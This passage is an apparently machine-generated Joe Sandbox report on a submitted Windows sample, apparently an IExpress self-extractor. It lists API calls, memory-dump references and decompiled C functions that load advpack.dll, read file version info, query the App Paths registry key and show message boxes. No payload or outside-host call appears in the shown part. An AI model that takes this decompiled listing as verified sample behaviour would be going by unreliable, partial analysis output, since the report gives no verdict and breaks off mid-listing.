                                                                                                                                                                                                        0x00de3961
                                                                                                                                                                                                        0x00de3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00de3915
                                                                                                                                                                                                        0x00de3915
                                                                                                                                                                                                        0x00de391b
                                                                                                                                                                                                        0x00de391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de392d
                                                                                                                                                                                                        0x00de3933
                                                                                                                                                                                                        0x00de3938
                                                                                                                                                                                                        0x00de393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3940
                                                                                                                                                                                                        0x00de3946
                                                                                                                                                                                                        0x00de394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38f2
                                                                                                                                                                                                        0x00de3843
                                                                                                                                                                                                        0x00de3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de384b
                                                                                                                                                                                                        0x00de384d
                                                                                                                                                                                                        0x00de3883
                                                                                                                                                                                                        0x00de3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de389a
                                                                                                                                                                                                        0x00de389e
                                                                                                                                                                                                        0x00de389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a0
                                                                                                                                                                                                        0x00de38a0
                                                                                                                                                                                                        0x00de38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a4
                                                                                                                                                                                                        0x00de384f
                                                                                                                                                                                                        0x00de3851
                                                                                                                                                                                                        0x00de3857
                                                                                                                                                                                                        0x00de386e
                                                                                                                                                                                                        0x00de3877
                                                                                                                                                                                                        0x00de387b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3881
                                                                                                                                                                                                        0x00de3859
                                                                                                                                                                                                        0x00de385c
                                                                                                                                                                                                        0x00de3862
                                                                                                                                                                                                        0x00de3866
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38f4
                                                                                                                                                                                                        0x00de38f4
                                                                                                                                                                                                        0x00de38f5
                                                                                                                                                                                                        0x00de38fb
                                                                                                                                                                                                        0x00de3901
                                                                                                                                                                                                        0x00de3901
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de390a
                                                                                                                                                                                                        0x00de374b
                                                                                                                                                                                                        0x00de374e
                                                                                                                                                                                                        0x00de375c
                                                                                                                                                                                                        0x00de3764
                                                                                                                                                                                                        0x00de3769
                                                                                                                                                                                                        0x00de376e
                                                                                                                                                                                                        0x00de3771
                                                                                                                                                                                                        0x00de379c
                                                                                                                                                                                                        0x00de379f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de37a3
                                                                                                                                                                                                        0x00de37a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de37a4
                                                                                                                                                                                                        0x00de3773
                                                                                                                                                                                                        0x00de3777
                                                                                                                                                                                                        0x00de3778
                                                                                                                                                                                                        0x00de377f
                                                                                                                                                                                                        0x00de3781
                                                                                                                                                                                                        0x00de378e
                                                                                                                                                                                                        0x00de378e
                                                                                                                                                                                                        0x00de3794
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3794
                                                                                                                                                                                                        0x00de3783
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3785
                                                                                                                                                                                                        0x00de378c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de378c
                                                                                                                                                                                                        0x00de3750
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de372d
                                                                                                                                                                                                        0x00de372d
                                                                                                                                                                                                        0x00de396b
                                                                                                                                                                                                        0x00de396b
                                                                                                                                                                                                        0x00de396c
                                                                                                                                                                                                        0x00de396e
                                                                                                                                                                                                        0x00de396f
                                                                                                                                                                                                        0x00de3a1e
                                                                                                                                                                                                        0x00de3a1e
                                                                                                                                                                                                        0x00de3a22
                                                                                                                                                                                                        0x00de3a27
                                                                                                                                                                                                        0x00de3a3e
                                                                                                                                                                                                        0x00de3a3e

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00DE3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DE39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00DE39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: ca56890ad02df19033130afd04dab599bdec51708f9316d33e3dfbd14d03de78
                                                                                                                                                                                                        • Instruction ID: f2dbf715f7a12ad4b94d9ca12900919fa946169b11aaa6c3d5b8538b152c7bc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca56890ad02df19033130afd04dab599bdec51708f9316d33e3dfbd14d03de78
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F91E1B1A012E49BDB35BB16CD887BAB7A1EB45304F1900A9D889DB241DB70CF80CF71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00DE6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00DE1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00DE658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00de6495
                                                                                                                                                                                                        0x00de6495
                                                                                                                                                                                                        0x00de64a0
                                                                                                                                                                                                        0x00de64a7
                                                                                                                                                                                                        0x00de64ab
                                                                                                                                                                                                        0x00de64bd
                                                                                                                                                                                                        0x00de64c2
                                                                                                                                                                                                        0x00de64d3
                                                                                                                                                                                                        0x00de64df
                                                                                                                                                                                                        0x00de64e8
                                                                                                                                                                                                        0x00de6502
                                                                                                                                                                                                        0x00de64ee
                                                                                                                                                                                                        0x00de64f9
                                                                                                                                                                                                        0x00de64f9
                                                                                                                                                                                                        0x00de6516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-836797370
                                                                                                                                                                                                        • Opcode ID: fc68359a27ba0fddde1508478b427e952143527bd0a6c80d27549d4f9c67eed3
                                                                                                                                                                                                        • Instruction ID: b0090d1816eb87f0ebb3ae6a98db016dbcc923cc6bd08af507802395717b4bb5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc68359a27ba0fddde1508478b427e952143527bd0a6c80d27549d4f9c67eed3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5201D630A002889BD750FB66DC89AEE7778DB60311F500195F585962C4DF70EE898A71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00DE2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00DE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00DE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x00de28f1
                                                                                                                                                                                                        0x00de28f4
                                                                                                                                                                                                        0x00de28f7
                                                                                                                                                                                                        0x00de28f9
                                                                                                                                                                                                        0x00de28fc
                                                                                                                                                                                                        0x00de28ff
                                                                                                                                                                                                        0x00de2901
                                                                                                                                                                                                        0x00de2907
                                                                                                                                                                                                        0x00de2a62
                                                                                                                                                                                                        0x00de2a64
                                                                                                                                                                                                        0x00de290d
                                                                                                                                                                                                        0x00de290d
                                                                                                                                                                                                        0x00de290f
                                                                                                                                                                                                        0x00de2912
                                                                                                                                                                                                        0x00de2920
                                                                                                                                                                                                        0x00de2937
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2944
                                                                                                                                                                                                        0x00de294a
                                                                                                                                                                                                        0x00de294f
                                                                                                                                                                                                        0x00de2a2f
                                                                                                                                                                                                        0x00de2a32
                                                                                                                                                                                                        0x00de2a34
                                                                                                                                                                                                        0x00de2a37
                                                                                                                                                                                                        0x00de2a41
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2955
                                                                                                                                                                                                        0x00de295e
                                                                                                                                                                                                        0x00de2962
                                                                                                                                                                                                        0x00de2969
                                                                                                                                                                                                        0x00de296f
                                                                                                                                                                                                        0x00de2974
                                                                                                                                                                                                        0x00de298c
                                                                                                                                                                                                        0x00de2a20
                                                                                                                                                                                                        0x00de2a21
                                                                                                                                                                                                        0x00de2a27
                                                                                                                                                                                                        0x00de2a4c
                                                                                                                                                                                                        0x00de2a4f
                                                                                                                                                                                                        0x00de2a50
                                                                                                                                                                                                        0x00de2a53
                                                                                                                                                                                                        0x00de2a56
                                                                                                                                                                                                        0x00de2a5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de29b2
                                                                                                                                                                                                        0x00de29b2
                                                                                                                                                                                                        0x00de29b5
                                                                                                                                                                                                        0x00de29bd
                                                                                                                                                                                                        0x00de29c3
                                                                                                                                                                                                        0x00de29cc
                                                                                                                                                                                                        0x00de29d5
                                                                                                                                                                                                        0x00de29d7
                                                                                                                                                                                                        0x00de29da
                                                                                                                                                                                                        0x00de29dd
                                                                                                                                                                                                        0x00de29df
                                                                                                                                                                                                        0x00de29ec
                                                                                                                                                                                                        0x00de29f8
                                                                                                                                                                                                        0x00de29fc
                                                                                                                                                                                                        0x00de29ff
                                                                                                                                                                                                        0x00de2a02
                                                                                                                                                                                                        0x00de2a07
                                                                                                                                                                                                        0x00de2a0a
                                                                                                                                                                                                        0x00de2a0f
                                                                                                                                                                                                        0x00de2a19
                                                                                                                                                                                                        0x00de2a81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de2a0f
                                                                                                                                                                                                        0x00de298c
                                                                                                                                                                                                        0x00de2974
                                                                                                                                                                                                        0x00de2962
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de294f
                                                                                                                                                                                                        0x00de2912
                                                                                                                                                                                                        0x00de2a65
                                                                                                                                                                                                        0x00de2a68
                                                                                                                                                                                                        0x00de2a6c
                                                                                                                                                                                                        0x00de2a6f
                                                                                                                                                                                                        0x00de2a6f
                                                                                                                                                                                                        0x00de2a7d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00DE2A6F
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharUpperA.USER32(B4DD4FDF,00000000,00000000,00000000), ref: 00DE27A8
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharNextA.USER32(0000054D), ref: 00DE27B5
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharNextA.USER32(00000000), ref: 00DE27BC
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2829
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2852
                                                                                                                                                                                                          • Part of subcall function 00DE2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2870
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00DE3938,?,?,?,?,-00000005), ref: 00DE2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00DE2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DE3938,?,?,?,?,-00000005,?), ref: 00DE2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00DE2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 72eff0e43b1248814fd0902470ae9ccfd46e706371d7255e04bfacc07319acde
                                                                                                                                                                                                        • Instruction ID: 67fe3eeb5cd4b2557777255df3cbd11e3cd334809637ec350d81bc14c68f5e4b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72eff0e43b1248814fd0902470ae9ccfd46e706371d7255e04bfacc07319acde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A511931E00259DBCB25EF99C885ABEBBB9FF48700F14406AE905E7311D7319A41DBB4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00DE4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00DE468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00DE468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00DE44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00de417d
                                                                                                                                                                                                        0x00de418f
                                                                                                                                                                                                        0x00de4193
                                                                                                                                                                                                        0x00de41b7
                                                                                                                                                                                                        0x00de41d3
                                                                                                                                                                                                        0x00de41e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de41e7
                                                                                                                                                                                                        0x00de41d5
                                                                                                                                                                                                        0x00de41d6
                                                                                                                                                                                                        0x00de41d8
                                                                                                                                                                                                        0x00de41d9
                                                                                                                                                                                                        0x00de41da
                                                                                                                                                                                                        0x00de41df
                                                                                                                                                                                                        0x00de41e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de41e1
                                                                                                                                                                                                        0x00de41b9
                                                                                                                                                                                                        0x00de41ba
                                                                                                                                                                                                        0x00de41bc
                                                                                                                                                                                                        0x00de41bd
                                                                                                                                                                                                        0x00de41be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de41be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00DE30B4), ref: 00DE4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00DE30B4), ref: 00DE41E7
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
